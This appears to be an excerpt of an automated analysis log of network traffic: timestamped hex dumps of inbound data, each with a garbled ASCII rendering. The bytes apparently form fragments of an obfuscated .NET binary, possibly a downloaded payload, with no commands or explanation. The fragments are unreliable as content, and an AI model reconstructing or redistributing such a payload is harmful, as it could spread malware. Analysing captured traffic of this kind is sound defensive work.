                                                      2022-04-20 12:54:01 UTC648INData Raw: 00 00 61 4b 00 93 00 08 00 00 cf 6c 01 d4 02 d8 00 00 61 37 00 93 00 08 00 00 cf 58 01 d4 02 d4 00 00 18 a3 18 91 00 08 00 00 cf 4c 01 d4 07 5d 00 00 61 2c 00 93 00 08 00 00 ce f4 01 d4 01 21 00 00 00 52 18 86 00 08 00 00 ce d4 01 d4 06 17 00 00 61 04 00 93 00 08 00 00 ce c0 01 d4 1e 86 00 00 60 f0 00 93 00 08 00 00 ce b0 01 d4 02 d8 00 00 60 dc 00 93 00 08 00 00 ce 9c 01 d4 02 d4 00 00 18 a3 18 91 00 08 00 00 ce 90 01 d4 07 5d 00 00 60 d1 00 93 00 08 00 00 cd e8 01 d4 01 21 00 00 00 52 18 86 00 08 00 00 cd c8 01 d4 06 17 00 00 60 a9 00 93 00 08 00 00 cd b4 01 d4 1e 7b 00 00 60 95 00 93 00 08 00 00 cd a4 01 d4 02 d8 00 00 60 81 00 93 00 08 00 00 cd 90 01 d4 02 d4 00 00 18 a3 18 91 00 08 00 00 cd 84 01 d4 07 5d 00 00 60 76 00 93 00 08 00 00 cd 00 01 d4 01
                                                      Data Ascii: aKla7XL]a,!Ra``]`!R`{``]`v
                                                      2022-04-20 12:54:01 UTC664INData Raw: 45 e4 00 26 02 e1 00 00 7f 63 00 21 0f 57 00 00 7e e9 00 11 2e 88 00 00 1d 97 00 26 2e 4f 00 00 1d 8e 00 26 31 75 00 00 1d 87 00 26 31 72 00 00 7e e2 00 26 0f 77 00 00 00 f1 00 26 07 d0 00 00 1d 79 00 26 02 e1 00 00 01 aa 00 26 12 81 00 00 48 ad 00 26 12 97 00 00 45 e4 00 26 02 e1 00 00 7e d7 00 21 0f 57 00 00 7d c8 00 13 02 e1 00 00 7d bd 00 21 0f 57 00 00 02 b1 00 26 31 31 00 00 7d b3 80 56 31 31 00 00 0f e6 80 56 31 31 00 00 7d a9 80 56 31 31 00 00 7d 9a 80 56 31 31 00 00 7d 93 80 56 31 31 00 00 7d 8b 80 56 02 e1 00 00 1c 5b 06 06 31 26 00 00 7d 4f 00 11 31 1b 00 00 7c ff 00 13 31 10 00 00 7c c3 00 11 31 05 00 00 7c 87 00 11 30 f5 00 00 7c 13 00 11 02 e1 00 00 7c 08 00 21 30 f0 00 00 7b ef 00 21 30 a1 00 00 7b 30 00 11 30 9b 00 00 7b 25 00 31 02 e1 00
                                                      Data Ascii: E&c!W~.&.O&1u&1r~&w&y&&H&E&~!W}}!W&11}V11V11}V11}V11}V11}V[1&}O1|1|1|0||!0{!0{00{%1
                                                      2022-04-20 12:54:01 UTC680INData Raw: 01 05 01 25 03 1e 00 59 00 00 00 00 00 00 02 af 00 00 01 85 01 24 03 1e 00 59 00 00 00 00 00 00 04 a0 00 00 01 80 01 1e 03 1d 00 59 00 00 00 00 00 00 04 9b 00 00 01 00 01 15 03 1b 00 59 00 00 00 00 00 00 04 96 00 00 01 00 01 13 03 1b 00 59 00 00 00 00 00 00 04 91 00 00 01 80 01 0f 03 1a 00 59 00 00 00 00 00 00 04 8c 00 00 00 00 01 08 03 19 00 59 00 00 00 00 00 00 04 87 00 00 01 80 01 03 03 18 00 59 00 00 00 00 00 00 04 82 00 00 01 80 00 fc 03 17 00 59 00 00 00 00 00 00 04 7d 00 00 01 80 00 f8 03 16 00 59 00 00 00 00 00 00 04 78 00 00 01 80 00 f2 03 15 00 59 00 00 00 00 00 00 03 e5 00 00 01 80 00 f1 03 15 00 00 00 00 00 00 00 00 02 ba 00 00 00 a0 00 e5 03 0c 00 59 00 00 00 00 00 00 04 64 00 00 01 03 00 de 03 09 00 5d 00 00 00 00 00 00 04 50 00 00 01 0b 00
                                                      Data Ascii: %Y$YYYYYYYY}YxYYd]P
                                                      2022-04-20 12:54:01 UTC696INData Raw: 0a 00 00 4a 28 06 00 11 21 28 01 00 00 16 20 05 11 0d 11 09 11 ff ff fc a3 38 ff ff fd 5b 3a 06 00 11 40 28 0a 00 00 4a 28 06 00 0e 45 28 01 00 00 16 20 9a 0e 11 07 11 00 00 03 3c 38 0b 13 13 11 ff ff fe f6 38 0a 00 00 53 6f 0a 00 03 68 7e 05 11 ff ff fd 57 38 00 00 02 32 39 0a 00 03 cb 6f 06 00 11 41 28 9a 0f 11 06 11 00 00 02 8a 38 00 00 02 e9 38 ff ff ff 3c 38 00 00 00 42 39 0a 00 01 dc 6f 9a 0e 11 07 11 ff ff ff 14 38 ff ff fe 8e 39 0a 00 03 cb 6f 0a 00 02 6f 6f 9a 11 11 06 11 ff ff fe c3 38 0a 00 02 e3 6f 9a 11 11 09 11 0a 00 03 35 7e 05 11 00 00 03 9c 38 0a 00 02 d6 6f 0a 00 03 2b 6f 9a 11 11 09 11 0a 00 02 da 7e 05 11 00 00 00 ec 38 a2 0a 00 00 6d 6f 0a 00 03 90 6f 0a 00 00 c0 6f 02 05 11 59 17 69 8e 09 11 09 11 00 00 00 00 38 00 00 01 11 39 0a 00
                                                      Data Ascii: J(!( 8[:@(J(E( <88Soh~W829oA(88<8B9o89ooo8o5~8o+o~8moooYi89
                                                      2022-04-20 12:54:01 UTC712INData Raw: 02 08 11 04 00 07 90 7b 02 ff ff da 5f 38 06 00 11 86 6f 06 00 0f c9 6f 1a 11 04 00 07 91 7b 02 00 00 1a 78 38 06 00 11 86 6f 06 00 0e 62 73 1c 12 11 04 00 07 91 7b 02 ff ff f0 de 38 06 00 11 1d 28 04 00 07 41 7b 04 00 07 42 7c 06 00 0f b0 6f 1a 11 06 00 11 57 6f 04 11 05 11 01 00 00 54 74 06 00 11 57 6f 14 06 00 11 88 6f 04 00 07 91 7b 02 2a 2a ff ff f4 9f 38 0a 00 04 07 6f 0d 11 04 00 07 94 7b 02 ff ff db 27 38 06 00 11 86 6f 06 00 11 87 6f 04 00 07 91 7b 02 04 00 07 91 7b 02 7a 06 00 10 60 73 2a ff ff f9 ed 38 05 13 06 00 11 1a 28 04 00 07 91 7b 02 2a ff ff e4 89 38 ff ff df 9d 39 1e 11 00 00 1a 52 38 ff ff dc 0f 3a 1a 11 00 00 14 42 38 0d 13 06 00 0f 3f 6f 02 00 01 98 74 1a 11 ff ff f8 a4 38 06 00 11 86 6f 06 00 0f ba 6f 1a 11 04 00 07 91 7b 02 ff ff
                                                      Data Ascii: {_8oo{x8obs{8(A{B|oWoTtWoo{**8o{'8oo{{z`s*8({*89R8:B8?ot8oo{
                                                      2022-04-20 12:54:01 UTC728INData Raw: 07 3a 9a 04 00 07 69 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 00 2a 00 00 00 00 38 a2 03 04 00 07 69 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 ff ff ff d3 38 04 00 07 68 7d 04 00 07 68 7b 02 00 01 a4 74 03 02 2a ff ff ff cd 38 04 00 07 69 7d 04 00 07 69 7b 02 00 01 a4 74 03 02 00 00 00 17 38 ff ff ff e9 39 02 00 01 a4 75 03 00 00 00 26 38 06 00 10 6e 6f 03 02 2a 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 7a 0a 00 00 00 2a 01 00 00 2a a5 14 00 22 00 00 00 ff ff ff db 38 04 00 07 68 7d 04 02 ff ff ff f3 38 04 00 07 b3 7d 1d 02 2a 00 00 00 01 38 04 00 07 69 7d 03 02 00 00 00 19 38 06 00 10 6b 28 02
                                                      Data Ascii: :i{**8i{***8h}h{t*8i}i{t89u&8no**z**"8h}8}*8i}8k(
                                                      2022-04-20 12:54:01 UTC743INData Raw: 06 00 11 52 6f 03 00 00 00 84 38 00 00 00 79 39 06 00 11 4d 6f 03 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 7a 06 00 10 60 73 2a 06 00 0f 36 73 6a 5b 04 00 07 41 7b 04 00 07 42 7c 06 00 0f b0 6f 02 04 00 07 41 7b 04 00 07 42 7c 06 00 0f b0 6f 02 00 01 98 74 03 2a 06 00 0f 36 73 5b 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0f b2 6f 02 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0f b2 6f 02 00 01 98 74 03 ff ff ff 7c 38 00 00 00 5e 39 06 00 11 4e 6f 03 2a 06 00 0f 36 73 6a 5b 04 00 07 41 7b 04 00 07 42 7c 06 00 0f b0 6f 02 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 2a 06 00 0f 36 73 5b 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0f a5 28 02 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0f b2 6f 02 00 01 95 74 03 ff ff ff b3 38 00 00 00 59 39 06 00 11 4d
                                                      Data Ascii: Ro8y9Mo*z`s*6sj[A{B|oA{B|ot*6s[L{M|oL{M|ot|8^9No*6sj[A{B|oA{B|t*6s[L{M|(L{M|ot8Y9M
                                                      2022-04-20 12:54:01 UTC759INData Raw: 38 04 00 07 4c 7d 03 04 00 07 4d 7c 02 2a 00 00 00 01 38 04 00 07 b3 7d 18 02 00 00 00 00 38 06 00 0f f4 28 02 00 00 00 00 38 06 00 0f 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 ff ff ff f3 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 ff ff ff d3 38 04 00 07 4e 7d 04 00 07 4e 7b 02 00 01 97 74 03 02 00 00 00 00 38 04 00 07 4d 7d 04 00 07 4d 7b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: 8L}M|*8}8(8$*8*8N}N{t8M}M{*******
                                                      2022-04-20 12:54:01 UTC775INData Raw: 30 13 00 00 00 2a 01 fe 09 08 0d 06 00 0d 5b 28 03 00 00 00 07 3a 07 0c 06 00 0d 5b 28 02 00 00 00 07 3a 06 2a 16 00 00 00 02 3a 07 00 00 00 08 3a 06 0d 60 62 18 1f 0a 00 03 0a 6f 1d 03 60 62 10 1f 0a 00 03 0a 6f 1c 03 60 62 1e 0a 00 03 0a 6f 1b 03 0a 00 03 0a 6f 1a 03 0b 17 00 00 00 2a 39 0a 00 02 62 6f 04 00 07 1a 7e 03 0c 60 62 18 1f 0a 00 03 0a 6f 1d 02 60 62 10 1f 0a 00 03 0a 6f 1c 02 60 62 1e 0a 00 03 0a 6f 1b 02 0a 00 03 0a 6f 1a 02 0a 17 00 00 00 2a 39 0a 00 02 62 6f 04 00 07 1a 7e 02 0d 16 0c 16 0b 16 0a 16 2a 16 00 00 00 02 3a 03 00 00 00 06 39 02 2a 17 00 00 00 02 39 0a 00 00 3c 28 03 02 11 00 01 be 00 00 00 c5 00 04 30 13 00 00 00 2a 58 5a 5d 58 8b 65 20 09 08 ff ff ff cc 3a 04 13 25 49 05 11 05 13 58 5a 18 d3 18 05 11 0d 61 04 11 58 09 62 1b
                                                      Data Ascii: 0*[(:[(:*::`bo`bo`boo*9bo~`bo`bo`boo*9bo~*:9*9<(0*XZ]Xe :%IXZaXb
                                                      2022-04-20 12:54:01 UTC791INData Raw: ff ff d0 24 39 06 00 0e 02 28 00 00 00 9e 20 00 00 33 fc 3a 69 8e 11 11 ff ff d0 3c 38 00 00 02 0a 20 26 ff ff d0 47 39 06 00 0e 02 28 00 00 02 68 20 9c 00 3f 0c fe 00 00 00 01 20 00 2b 0c fe ff ff d0 64 38 00 00 00 9e 20 26 ff ff d0 6f 3a 06 00 0e 01 28 00 00 00 a6 20 9c 00 19 0c fe 00 00 00 04 20 00 0e 0c fe ff ff d0 8c 38 00 00 02 17 20 ff ff eb 8a 38 ff ff d0 9b 38 00 00 02 66 20 9c 6c 1f 0b 1f 6d 11 ff ff d0 ac 38 00 00 00 9c 20 07 13 06 00 0d 4e 28 54 11 ff ff d0 bf 38 00 00 02 70 20 26 ff ff d0 ca 3a 06 00 0e 02 28 00 00 00 07 20 9c 91 19 4c 11 58 19 50 11 4d 11 ff ff d0 e4 38 00 00 01 a4 20 26 ff ff d0 ef 3a 06 00 0e 01 28 00 00 01 f3 20 9c 00 3f 0c fe 00 00 00 08 20 00 2b 0c fe ff ff d1 0c 38 00 00 00 d3 20 26 ff ff d1 17 3a 06 00 0e 01 28 00 00
                                                      Data Ascii: $9( 3:i<8 &G9(h ? +d8 &o:( 8 88f lm8 N(T8p &:( LXPM8 &:( ? +8 &:(
                                                      2022-04-20 12:54:01 UTC807INData Raw: fe 00 07 0e fe 59 00 00 00 3f 20 00 00 00 be 20 9c 00 07 0c fe 00 00 00 09 20 00 26 0c fe 00 07 0e fe 58 00 00 00 2f 20 00 00 00 2d 20 9c 58 00 00 00 0a 20 00 00 00 0e 20 00 00 00 09 20 00 26 0c fe 9c 00 07 0c fe 00 00 00 09 20 00 26 0c fe 00 07 0e fe 58 00 00 00 55 20 00 00 00 20 20 9c 59 00 00 00 6b 20 00 00 00 ae 20 00 00 00 08 20 00 26 0c fe 9c 00 0c 0c fe 00 00 00 08 20 00 26 0c fe 00 0c 0e fe 58 00 00 00 47 20 00 00 00 6c 20 9c 00 0c 0c fe 00 00 00 08 20 00 26 0c fe 00 0c 0e fe 59 00 00 00 46 20 00 00 00 d3 20 9c 00 07 0c fe 00 00 00 08 20 00 26 0c fe 00 07 0e fe 59 00 00 00 38 20 00 00 00 a8 20 9c 58 00 00 00 47 20 00 00 00 7c 20 00 00 00 08 20 00 26 0c fe 9c 59 00 00 00 3f 20 00 00 00 7b 20 00 00 00 07 20 00 26 0c fe 9c 00 07 0c fe 00 00 00 07 20
                                                      Data Ascii: Y? &X/ - X & &XU Yk & &XG l &YF &Y8 XG | &Y? { &
                                                      2022-04-20 12:54:01 UTC823INData Raw: 00 2a 14 00 00 12 00 00 2a 04 00 06 64 7e 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 2a ff ff ff dd 38 06 00 0a fd 28 00 00 00 0a 38 04 00 06 63 80 06 00 0a f8 73 00 00 00 00 38 06 00 0a fe 28 00 00 00 19 38 06 00 0d 4c 28 ba 00 00 2a 00 00 00 00 38 0a 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 0a 00 02 a4 28 1a 06 00 0a fc 28 04 06 00 0a fc 28 03 2a 17 00 00 00 00 38 00 00 00 07 3a 04 2a 15 00 00 00 00 38 00 00 00 07 3a 03 2a 16 00 00 00 00 38 00 00 00 07 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 16 00 00 12 00 2a 06 00 0a f7 28 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 16 00 00 12 00 00 2a 04 00 06 4e 7e 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: **d~***8(8cs8(8L(*8**(((*8:*8:*8@**(**N~*
                                                      2022-04-20 12:54:01 UTC839INData Raw: 7a 0a 00 02 07 73 06 00 0d 46 28 61 04 00 07 d4 7b 04 00 08 43 7e 61 de 32 66 c4 20 61 ac 31 7d d3 20 12 5e 58 86 20 0a 00 00 45 28 03 06 00 0d 46 28 61 04 00 08 13 7b 04 00 08 43 7e 61 9c f6 c2 53 20 84 e1 94 68 20 00 00 00 00 38 00 00 00 9d 3f 69 8e 06 11 03 11 00 00 00 7e 38 00 13 06 00 0c ec 28 0a 00 00 4a 28 06 00 0e 45 28 02 00 01 1b 20 02 00 00 00 de 38 00 00 00 e3 00 00 00 01 45 00 02 0c fe 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 ff ff ff a4 38 ff ff ff cb 39 0a 00 00 b1 28 03 2a ff ff ff e3 38 06 00 0c b5 28 02 00 00 00 0b 38 06 00 0c be 28 06 00 0c bc 28 03 02 02 00 00 00 12 38 06 00 0c b7 28 04 02 7a 0a 00 01 8d 73 06 00 0d 46 28 61 04 00 07 d2 7b 04 00 08 43 7e 61 31 2f fe 2d 20 66 ad 69 9d 1d 20 00 00 00 4c 00
                                                      Data Ascii: zsF(a{C~a2f a1} ^X E(F(a{C~aS h 8?i~8(J(E( 8E*89(*8(8((8(zsF(a{C~a1/- fi L
                                                      2022-04-20 12:54:01 UTC855INData Raw: ff 8a 39 0a 00 00 3c 28 06 00 0d 46 28 61 04 00 07 e7 7b 04 00 08 43 7e 61 16 79 c3 76 20 61 c6 03 ed 64 20 be 2c 17 14 20 0a 00 01 a0 6f 0a 00 02 ac 6f 01 11 00 00 00 3c 38 00 00 00 92 3a 0a 00 01 9f 28 14 02 7a 0a 00 01 33 73 0a 00 00 45 28 00 11 06 00 0d 46 28 61 04 00 07 c9 7b 04 00 08 43 7e 61 cf d7 98 b6 20 58 48 69 27 50 20 64 82 c3 34 20 7a 0a 00 01 33 73 0a 00 00 45 28 00 11 06 00 0d 46 28 61 04 00 07 f9 7b 04 00 08 43 7e 61 f4 aa d3 76 20 58 06 d1 3f fb 20 e9 d2 4a e1 20 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 7a 0a 00 01 33 73 0a 00 00 45 28 0a 00 02 0a 6f 03 06 00 0d 46 28 61 04 00 08 06 7b 04 00 08 43 7e 61 72 6d 78 05 20 22 84 7d ae 20 00 00 00 00 38 00 00 00 31 39 0a 00 02 0b 28 06 00 0b f8 28 03 00
                                                      Data Ascii: 9<(F(a{C~ayv ad , oo<8:(z3sE(F(a{C~a XHi'P d4 z3sE(F(a{C~av X? J \**z3sE(oF(a{C~armx "} 819((
                                                      2022-04-20 12:54:01 UTC871INData Raw: 00 08 25 7b 04 00 08 43 7e 00 00 00 00 20 00 13 06 00 05 9f 28 03 ff ff fe e2 38 54 60 17 4a 05 0e 05 0e 2a 06 00 0d 46 28 61 04 00 08 21 7b 04 00 08 43 7e 61 d7 f9 c7 bb 20 58 48 69 27 50 20 64 82 c3 34 20 ff ff fd fd 38 ff ff fd c9 38 ff ff fd 42 38 00 01 0e fe 00 00 00 04 20 00 00 02 dc 39 06 00 0b 7a 28 14 00 11 ff ff fe e4 38 00 00 03 30 3b 19 04 00 00 01 e3 38 00 00 01 68 00 00 01 b2 00 00 03 80 00 00 00 58 00 00 01 4b 00 00 01 29 00 00 03 e1 ff ff fe d2 00 00 00 d7 ff ff fd d4 00 00 00 d7 ff ff fd d4 00 00 00 d7 ff ff fd d4 00 00 00 d7 00 00 01 0d 00 00 00 10 45 59 19 03 11 ff ff ff 85 38 00 00 02 97 39 02 00 01 42 75 02 11 2a 06 00 0a 7a 6f 06 00 0a a3 6f 17 06 00 0b 23 28 03 02 2a 06 00 0d 46 28 61 04 00 08 3e 7b 04 00 08 43 7e 61 ad 9b d9 fd 20
                                                      Data Ascii: %{C~ (8T`J*F(a!{C~a XHi'P d4 88B8 9z(80;8hXK)EY89Bu*zoo#(*F(a>{C~a
                                                      2022-04-20 12:54:01 UTC887INData Raw: ff 37 38 00 00 01 2c 38 ff ff ff f8 39 00 11 2a ff ff fd 9e 38 ff ff fe 90 39 0a 00 02 90 28 14 06 00 0a 8e 28 02 12 06 00 0a 83 6f 04 00 00 00 00 38 ff ff fe fc 39 06 00 0a c2 6f 04 2a ff ff fe 2b 38 ff ff fd bf 3f 69 8e 02 11 03 11 ff ff fe db 38 dc 00 00 00 00 38 0a 00 00 3f 6f 0b 11 00 00 00 00 38 00 00 00 11 39 0b 11 ff ff fe f9 dd 00 00 00 00 38 ff ff ff e6 3a 0a 00 00 92 6f 0b 11 ff ff ff e4 38 0c 13 0a 00 02 b8 6f 0b 11 00 00 00 0e 38 06 00 0b 1f 28 0c 11 03 02 00 00 00 0e 38 00 00 00 21 38 00 00 00 00 99 38 06 00 0b 1e 28 00 11 03 02 00 00 01 f2 38 ff ff ff 2b 3f 69 8e 0d 11 0e 11 ff ff fe 5d 38 26 06 00 0a 23 6f 00 11 03 ff ff ff 72 38 00 13 06 00 0a a2 6f 06 00 0b 64 28 0f 11 00 00 00 aa 38 06 00 0b 1f 28 01 11 03 02 ff ff fe 44 38 00 00 00 01
                                                      Data Ascii: 78,89*89((o89o*+8?i88?o898:o8o8(8!88(8+?i]8&#or8od(8(D8
                                                      2022-04-20 12:54:01 UTC903INData Raw: 11 06 00 0d 46 28 61 04 00 07 f4 7b 04 00 08 43 7e 61 7e b1 37 53 20 1b e2 85 e7 20 0c 11 ff ff fb a8 38 06 00 0c 75 6f 02 00 00 f6 a5 13 11 08 11 ff ff fc d7 38 07 13 01 00 00 08 8c 16 ff ff fa 3e 38 00 00 00 25 39 0a 00 02 6d 28 14 0d 11 00 00 00 b0 38 06 00 0c 6b 6f 06 00 0a e7 28 04 08 11 ff ff ff dd 38 ff ff fe 55 39 06 00 0b 12 6f 04 00 06 5b 7b 02 ff ff fb af 38 0a 13 06 00 05 9e 28 01 11 ff ff fc 5a 38 ff ff fb 26 3b 66 1f 0a 11 ff ff fc 15 38 02 13 14 ff ff fe 72 38 ff ff fc 3b 38 ff ff fe ee 38 ff ff fc 45 3f 16 09 11 ff ff fd cd 38 14 13 16 ff ff fe 6f 38 06 00 0c 7e 6f 06 00 06 2b 6f 04 08 11 ff ff fd c8 38 0d 13 06 00 05 a8 28 17 0a 00 00 45 28 06 00 0d 46 28 61 04 00 07 fb 7b 04 00 08 43 7e 61 ad 99 f9 3e 20 59 45 f4 ec d8 20 25 ab cf 02 20
                                                      Data Ascii: F(a{C~a~7S 8uo8>8%9m(8ko(8U9o[{8(Z8&;f8r8;88E?8o8~o+o8(E(F(a{C~a> YE %
                                                      2022-04-20 12:54:01 UTC919INData Raw: 00 2a 17 2a 0a 00 02 6b 28 14 04 00 06 53 7b 02 00 00 00 00 38 00 00 00 12 3a 06 00 0a 67 28 14 04 00 06 51 7b 02 ff ff ff d4 38 00 00 00 28 3a 06 00 0a 67 28 14 04 00 06 50 7b 02 00 00 00 16 38 00 00 00 3e 3a 06 00 0a 67 28 14 04 00 06 52 7b 02 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 00 2a 00 00 00 00 38 04 00 06 53 7d 06 00 0a 57 28 03 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 2a 04 00 06 53 7b 02 00 00 00 2a 14 00 00 12 00 00 2a 00 00 00 00 38 04 00 06 51 7d 06 00 0a 57 28 03 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 2a 04 00 06 51 7b 02 00 00 00 2a 14 00 00 12 00 00 2a 00 00 00 00 38 04 00 06 52 7d 06 00 0a 57 28 03 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00
                                                      Data Ascii: **k(S{8:g(Q{8(:g(P{8>:g(R{**8S}W(**S{**8Q}W(**Q{**8R}W(*
                                                      2022-04-20 12:54:01 UTC935INData Raw: 09 11 ff ff fc 42 dd ff ff ff 7d 38 17 13 9a 0f 11 01 11 ff ff ff bc 38 ff ff ff 41 38 ff ff fe bc 38 ff ff fe fd 39 06 00 05 a0 28 06 00 0d 1b 6f 9a 0f 11 01 11 ff ff fd b5 38 06 00 0c d9 6f 0d 11 03 ff ff fe d7 38 02 00 01 77 a4 06 00 09 9c 28 03 0e 11 0d 11 ff ff fc b1 38 00 00 00 04 20 26 ff ff fc bc 3a 04 00 08 48 7b 04 00 08 43 7e 00 00 00 00 20 06 00 0c c2 6f 17 11 10 11 06 00 09 9e 28 9a 0f 11 01 11 03 ff ff ff 94 38 10 13 9a 0f 11 04 00 06 28 7b 02 ff ff ff d7 38 ff ff fe 01 38 ff ff ff bf 38 06 00 0c d4 6f 03 00 00 00 15 38 06 00 0c a0 6f 02 00 01 77 a3 0f 11 0d 11 03 ff ff ff 91 38 00 00 00 71 3f 69 8e 04 00 06 26 7b 02 0e 11 ff ff ff 2f 38 06 00 0c d2 6f 17 12 11 03 ff ff fe 3c 38 00 00 00 d7 3a 06 00 08 60 6f 10 11 ff ff ff 2a 38 06 00 0c b7
                                                      Data Ascii: B}88A889(o8o8w(8 &:H{C~ o(8({888o8ow8q?i&{/8o<8:`o*8
                                                      2022-04-20 12:54:01 UTC951INData Raw: 61 04 00 07 d9 7b 04 00 08 43 7e 61 8d b0 f6 a4 20 66 76 51 74 60 20 2a ff ff ff bf 38 00 00 00 36 39 06 00 05 a0 28 00 11 00 00 00 41 38 04 00 06 00 7d 0a 00 02 4e 6f a2 00 11 16 25 01 00 00 41 8d 17 06 00 0b d4 6f 0a 00 00 4a 28 06 00 0e 45 28 01 00 00 ca 20 03 02 00 00 00 7f 38 06 00 08 f3 28 04 02 00 00 00 00 38 06 00 0e 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 2a 06 00 04 a4 28 00 03 09 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 04 00 05 ff 7e 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 2a 06 00 0d 41 28 06 00 0d 4c 28 2e 00 00 ff ff ff de 38 06 00 0c b5 6f 03 ff ff ff 8b 38 06 00 0c b2 6f 06 00 0c a8 6f 04 00 05 fc 7b 02 03 03 ff ff ff 90 38 06 00 0c be
                                                      Data Ascii: a{C~a fvQt` *869(A8}No%AoJ(E( 8(8C**(**~***A(L(.8o8oo{8
                                                      2022-04-20 12:54:01 UTC967INData Raw: 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 2a 06 00 08 5f 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 2a 0a 00 00 58 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 00 2a 06 00 0c 0f 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 00 2a 04 00 05 e0 7e 00 00 00 2a 14 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 2a 06 00 0d 41 28 06 00 0d
                                                      Data Ascii: **_o**Xo******o******~***A(
                                                      2022-04-20 12:54:01 UTC983INData Raw: 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 17 00 00 12 00 ff ff ff ee 38 06 00 06 ae 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 00 2a 06 00 06 77 28 04 14 ff ff ff e0 38 00 00 00 05 3a 04 00 05 b8 7b 02 00 00 00 10 38 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 14 00 00 12 00 00 2a 00 00 00 00 38 04 00 05 b8 7d 04 02 00 00 00 00 38 0a 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 04 00 05 b7 7e 00 00 00 2a 14 00 00 12 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00
                                                      Data Ascii: *8(**w(8:{8**8}8**~*******
                                                      2022-04-20 12:54:01 UTC999INData Raw: 00 05 87 7b 02 2a 7a 0a 00 01 33 73 06 00 0d 46 28 61 04 00 07 e2 7b 04 00 08 43 7e 61 67 d9 2c da 20 7b 81 91 57 20 00 00 00 22 38 00 00 00 05 3a 04 00 05 89 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 00 2a ff ff ff b4 38 ff ff ff da 39 04 00 05 87 7b 02 00 00 00 00 38 ff ff ff c9 3a 04 00 05 89 7b 02 00 00 00 20 38 06 00 06 bc 28 02 7a 0a 00 01 33 73 06 00 0d 46 28 61 04 00 08 0a 7b 04 00 08 43 7e 61 20 f6 78 fb 20 4b a6 cd 33 20 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 00 00 12 00 00 00 ff ff ff db 38 06 00 06 c4 28 03 ff ff ff c5 38 ff ff ff cb 3f 02 59 04 00 05 8d 7b 03 69 8e 04 00 05 8c 7b 03 2a 00 00 00 00 38 06 00 04 c3 28 04 00 05 8d 7b 03 16 58 04 00 05 8d 7b 03 02 04 00 05 8c 7c 03 2a 00 00 00 3b
                                                      Data Ascii: {*z3sF(a{C~ag, {W "8:{**89{8:{ 8(z3sF(a{C~a x K3 ,*8(8?Y{i{*8({X{|*;
